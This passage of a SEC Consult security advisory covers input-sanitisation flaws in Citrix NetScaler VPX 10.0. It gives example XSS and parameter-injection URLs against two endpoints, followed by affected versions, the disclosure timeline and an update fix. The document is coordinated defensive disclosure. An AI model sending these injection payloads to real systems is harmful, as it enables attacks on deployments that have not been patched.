Other pages do not sanitize user input properly as well:
http://<host>/pcidss/launch_report?type=AA";alert('xss');x="
http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC
Note: Content-Type is application/x-java-jnlp-file, so the injected script code is not interpreted. However, it is possible to inject arguments into a Java JNLP file, which might be used in further attacks.

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0, which was the most recent version at the time of discovery. According to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable.

Vendor contact timeline:
------------------------
2014-01-09: Sending advisory and proof of concept exploit via encrypted channel.
2014-01-17: Vendor acknowledges receipt of advisory.
2014-04-04: Requesting status update.
2014-06-10: Vendor is "in the process of scheduling the release of a security bulletin".
2014-07-07: Requesting list of affected/non-affected versions CVE-IDs.
2014-07-07: Vendor is "still in the final stages of releasing the bulletin".
2014-07-07: Requesting info about cause of delay.
2014-07-07: Vendor is "still hopeful that the bulletin will be available soon".
2014-07-14: Vendor states that fixed version will be available on July 15/16.
2014-07-16: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to a more recent version of Citrix NetScaler. More information can be found at: https://support.citrix.com/article/ctx140863

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult? Write to career@sec-consult.com

EOF Stefan Viehböck / @2014